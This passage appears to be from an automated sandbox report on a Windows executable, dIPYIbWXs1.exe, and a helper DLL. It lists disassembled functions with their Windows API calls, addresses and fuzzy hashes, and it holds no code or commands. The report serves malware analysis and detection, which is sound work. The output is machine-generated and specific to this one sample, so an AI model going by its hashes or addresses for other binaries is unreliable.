                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: ProtectVirtual
                                                        • String ID:
                                                        • API String ID: 544645111-0
                                                        • Opcode ID: 710bc8ad9261567a36981b193a068e1877cc6286bd01a64527ce6009c74f97a8
                                                        • Instruction ID: cdd909d89fa977ec58f560bec0cc2f851fcb5009581bad42335be468593e92a8
                                                        • Opcode Fuzzy Hash: 710bc8ad9261567a36981b193a068e1877cc6286bd01a64527ce6009c74f97a8
                                                        • Instruction Fuzzy Hash: E3F022B1D18A80DFCB60EFBDA484B053EF0AF1A3D5B11456AE158D7242F37458468B25
                                                        APIs
                                                        • GetPrivateProfileStringA.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402413
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: PrivateProfileString
                                                        • String ID:
                                                        • API String ID: 1096422788-0
                                                        • Opcode ID: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                        • Instruction ID: ec2b9ed2aa8753cc56e49b6d1f5b0ead50a941972cde74363bc07da0fbfd84e4
                                                        • Opcode Fuzzy Hash: b20ff68c1f91e8945650ad06eb6636fe2efcf37a6f72d7170e5f25b2e3b7c808
                                                        • Instruction Fuzzy Hash: 40E04630904208BAEB006FA08E09EAD3A79EF01710F20003AF9617B0D1E6B89482D72E
                                                        APIs
                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,0042A070,?,?,0040600B,0042A070,?,?,?,00000002,Call), ref: 00405FA1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Open
                                                        • String ID:
                                                        • API String ID: 71445658-0
                                                        • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                        • Instruction ID: 8d979316dbb681ef417a562383420c35b8ea1d7cbf1ba97b3ef1f912197d15a8
                                                        • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                        • Instruction Fuzzy Hash: 26D0EC7200460ABBDF115E90DD05FAB3B1DEB08310F044426FA05E5091D679D530AA25
                                                        APIs
                                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: AttributesFile
                                                        • String ID:
                                                        • API String ID: 3188754299-0
                                                        • Opcode ID: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                        • Instruction ID: 936ed37629fa473271aaed7dd48578ad272974d6d3f069640798472dc64bc079
                                                        • Opcode Fuzzy Hash: 5887674a1f5513ec9541be2dff6cbc71c684969360942c525d855edfecb85619
                                                        • Instruction Fuzzy Hash: F6D01232704115DBDB10EFA59B08A9E73B5EB10325B308277E111F21D1E6B9C9469A2D
                                                        APIs
                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: FilePointer
                                                        • String ID:
                                                        • API String ID: 973152223-0
                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                        APIs
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                          • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,74DF23A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                          • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,74DF23A0), ref: 0040527A
                                                          • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                          • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                          • Part of subcall function 00405796: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C098,Error launching installer), ref: 004057BF
                                                          • Part of subcall function 00405796: CloseHandle.KERNEL32(?), ref: 004057CC
                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0
                                                          • Part of subcall function 00406575: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406586
                                                          • Part of subcall function 00406575: GetExitCodeProcess.KERNEL32(?,?), ref: 004065A8
                                                          • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                        • String ID:
                                                        • API String ID: 2972824698-0
                                                        • Opcode ID: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                        • Instruction ID: 93961662e530d2e5a08160df11036b73ffef590b917d11c16f189fde5a143e01
                                                        • Opcode Fuzzy Hash: ada5aadaf350f23a8dbf3a026041224ab9f957c4560aafed3a43088b721b475c
                                                        • Instruction Fuzzy Hash: 88F09032A05021EBCB20BBA15E84DAFB2B5DF01318B21423FF502B21D1DB7C4D425A6E
                                                        APIs
                                                        • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Sleep
                                                        • String ID:
                                                        • API String ID: 3472027048-0
                                                        • Opcode ID: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                        • Instruction ID: c67a8691079fc4563931701ff3f7f14ff0a893aaeadd9329411c5994133067d8
                                                        • Opcode Fuzzy Hash: 5004c81fc86d5aad5056578f097f916dd0ceefac499e9113037a72ef071e40e2
                                                        • Instruction Fuzzy Hash: 0CD05E73B10100DBD720EBB8BAC485F77B8EB503253308837E402E2091E579C8424628
                                                        APIs
                                                        • GlobalAlloc.KERNELBASE(00000040,6E4B1233,?,6E4B12CF,-6E4B404B,6E4B11AB,-000000A0), ref: 6E4B121D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: AllocGlobal
                                                        • String ID:
                                                        • API String ID: 3761449716-0
                                                        • Opcode ID: 21b7c9d72b134dcd0e8e7f076f17c48b54bcdd2599d5c61e6eb56cd3fdac46e8
                                                        • Instruction ID: a3aa879114f2b1369c554edc6b94fd19f3331bc2c12f1955ef86e47f1593861a
                                                        • Opcode Fuzzy Hash: 21b7c9d72b134dcd0e8e7f076f17c48b54bcdd2599d5c61e6eb56cd3fdac46e8
                                                        • Instruction Fuzzy Hash: B5A00271D44900DBDE41FBF1AD4EF143B21EF4B741F008040E31554198D6B54411DB35
                                                        APIs
                                                        • GetDlgItem.USER32(?,00000403), ref: 004053BB
                                                        • GetDlgItem.USER32(?,000003EE), ref: 004053CA
                                                        • GetClientRect.USER32(?,?), ref: 00405407
                                                        • GetSystemMetrics.USER32(00000002), ref: 0040540E
                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040542F
                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405440
                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405453
                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 00405461
                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405474
                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405496
                                                        • ShowWindow.USER32(?,00000008), ref: 004054AA
                                                        • GetDlgItem.USER32(?,000003EC), ref: 004054CB
                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054DB
                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054F4
                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405500
                                                        • GetDlgItem.USER32(?,000003F8), ref: 004053D9
                                                          • Part of subcall function 004041B0: SendMessageA.USER32(00000028,?,?,00403FE0), ref: 004041BE
                                                        • GetDlgItem.USER32(?,000003EC), ref: 0040551C
                                                        • CreateThread.KERNEL32(00000000,00000000,Function_000052F0,00000000), ref: 0040552A
                                                        • CloseHandle.KERNEL32(00000000), ref: 00405531
                                                        • ShowWindow.USER32(00000000), ref: 00405554
                                                        • ShowWindow.USER32(?,00000008), ref: 0040555B
                                                        • ShowWindow.USER32(00000008), ref: 004055A1
                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055D5
                                                        • CreatePopupMenu.USER32 ref: 004055E6
                                                        • AppendMenuA.USER32(00000000,00000000,?,00000000), ref: 004055FB
                                                        • GetWindowRect.USER32(?,000000FF), ref: 0040561B
                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405634
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405670
                                                        • OpenClipboard.USER32(00000000), ref: 00405680
                                                        • EmptyClipboard.USER32 ref: 00405686
                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040568F
                                                        • GlobalLock.KERNEL32(00000000), ref: 00405699
                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004056AD
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004056C6
                                                        • SetClipboardData.USER32(?,00000000), ref: 004056D1
                                                        • CloseClipboard.USER32 ref: 004056D7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                        • String ID:
                                                        • API String ID: 590372296-0
                                                        • Opcode ID: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                        • Instruction ID: ad896caeff922a337f51dbee0e8d50556c939e1053927b0f1ec287220421205b
                                                        • Opcode Fuzzy Hash: e77ccb86652fbc0499d97b80cacae04005d5d9073b444bb924cd904a6cf5059e
                                                        • Instruction Fuzzy Hash: 3DA14A70900608BFDB119F61DD89EAE7FB9FB08354F50403AFA45BA1A0CB754E519F68
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003FB), ref: 0040465C
                                                        • SetWindowTextA.USER32(00000000,?), ref: 00404686
                                                        • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404737
                                                        • CoTaskMemFree.OLE32(00000000), ref: 00404742
                                                        • lstrcmpiA.KERNEL32(Call,0042A890), ref: 00404774
                                                        • lstrcatA.KERNEL32(?,Call), ref: 00404780
                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404792
                                                          • Part of subcall function 004057F7: GetDlgItemTextA.USER32(?,?,00000400,004047C9), ref: 0040580A
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\dIPYIbWXs1.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040642A
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 00406437
                                                          • Part of subcall function 004063D2: CharNextA.USER32(?,"C:\Users\user\Desktop\dIPYIbWXs1.exe",74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040643C
                                                          • Part of subcall function 004063D2: CharPrevA.USER32(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000,00403323,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 0040644C
                                                        • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,?,00429860,?,?,000003FB,?), ref: 00404850
                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040486B
                                                          • Part of subcall function 004049C4: lstrlenA.KERNEL32(0042A890,0042A890,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004048DF,000000DF,00000000,00000400,?), ref: 00404A62
                                                          • Part of subcall function 004049C4: wsprintfA.USER32 ref: 00404A6A
                                                          • Part of subcall function 004049C4: SetDlgItemTextA.USER32(?,0042A890), ref: 00404A7D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: A$C:\Users\user\tranchet$Call
                                                        • API String ID: 2624150263-3194087895
                                                        • Opcode ID: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                        • Instruction ID: 02b07c61478aeb9ac600f99876a590f4236d4304051c708c1213a6c52027fc1c
                                                        • Opcode Fuzzy Hash: 22496922587a79a87c82097af160ec6f00736279c4fa3eb8ac5991cd3654d7e0
                                                        • Instruction Fuzzy Hash: CAA16FB1900209ABDB11EFA6DD45AAF77B8EF84314F14843BF601B62D1DB7C89418B69
                                                        APIs
                                                          • Part of subcall function 6E4B1215: GlobalAlloc.KERNELBASE(00000040,6E4B1233,?,6E4B12CF,-6E4B404B,6E4B11AB,-000000A0), ref: 6E4B121D
                                                        • GlobalAlloc.KERNEL32(00000040,000014A4), ref: 6E4B1BC4
                                                        • lstrcpyA.KERNEL32(00000008,?), ref: 6E4B1C0C
                                                        • lstrcpyA.KERNEL32(00000408,?), ref: 6E4B1C16
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B1C29
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B1D09
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B1D0E
                                                        • GlobalFree.KERNEL32(?), ref: 6E4B1D13
                                                        • GlobalFree.KERNEL32(00000000), ref: 6E4B1EFA
                                                        • lstrcpyA.KERNEL32(?,?), ref: 6E4B2098
                                                        • GetModuleHandleA.KERNEL32(00000008), ref: 6E4B2114
                                                        • LoadLibraryA.KERNEL32(00000008), ref: 6E4B2125
                                                        • GetProcAddress.KERNEL32(?,?), ref: 6E4B217E
                                                        • lstrlenA.KERNEL32(00000408), ref: 6E4B2198
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3953123008.000000006E4B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 6E4B0000, based on PE: true
                                                        • Associated: 00000000.00000002.3953105444.000000006E4B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953136467.000000006E4B3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000000.00000002.3953149275.000000006E4B5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_6e4b0000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                        • String ID:
                                                        • API String ID: 245916457-0
                                                        • Opcode ID: 92cc2c61c649219fcf775243762498d033249b24e0149e499f99d295d85ecfeb
                                                        • Instruction ID: cf1a50d9b83944e8b49231fdf7b853e1ebd85ccd9d468bebf627bc3604dfb061
                                                        • Opcode Fuzzy Hash: 92cc2c61c649219fcf775243762498d033249b24e0149e499f99d295d85ecfeb
                                                        • Instruction Fuzzy Hash: 5C229D71D5460A9FDB508FF98490BEEBBF4BB06305F10452FD1A5A7380DBB4658ACBA0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                        • Instruction ID: f64ed9f862d89b69eb15ddc430260785fe10463149b241517d112065bf602f9e
                                                        • Opcode Fuzzy Hash: 1141b8caf72e3132df9e3aa140a50eda8930c9371ed3a7f86c2d2c6764d1ec0e
                                                        • Instruction Fuzzy Hash: 57E19BB190070ACFDB24CF59C880BAAB7F5EB45305F15892EE497A7291D378AA51CF14
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3911703874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.3911680177.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911725118.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911740222.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.3911852690.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_dIPYIbWXs1.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                        • Instruction ID: 8f207273dfcdbc59f762b6c847d1a58b94b1624b669f9e87ec0d9a9138a8e2bc
                                                        • Opcode Fuzzy Hash: 99f6c7e6b8620be82bccd3d2e3e98bb61de1be8b453b643f323292903d4af905
                                                        • Instruction Fuzzy Hash: 0DC15A31E04259CBCF18CF68D4905EEBBB2BF98314F25826AD8567B380D734A942CF95
                                                        APIs
                                                        • GetDlgItem.USER32(?,000003F9), ref: 00404B97
                                                        • GetDlgItem.USER32(?,00000408), ref: 00404BA4
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404BF3
                                                        • LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404C0A
                                                        • SetWindowLongA.USER32(?,000000FC,00405192), ref: 00404C24
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404C36
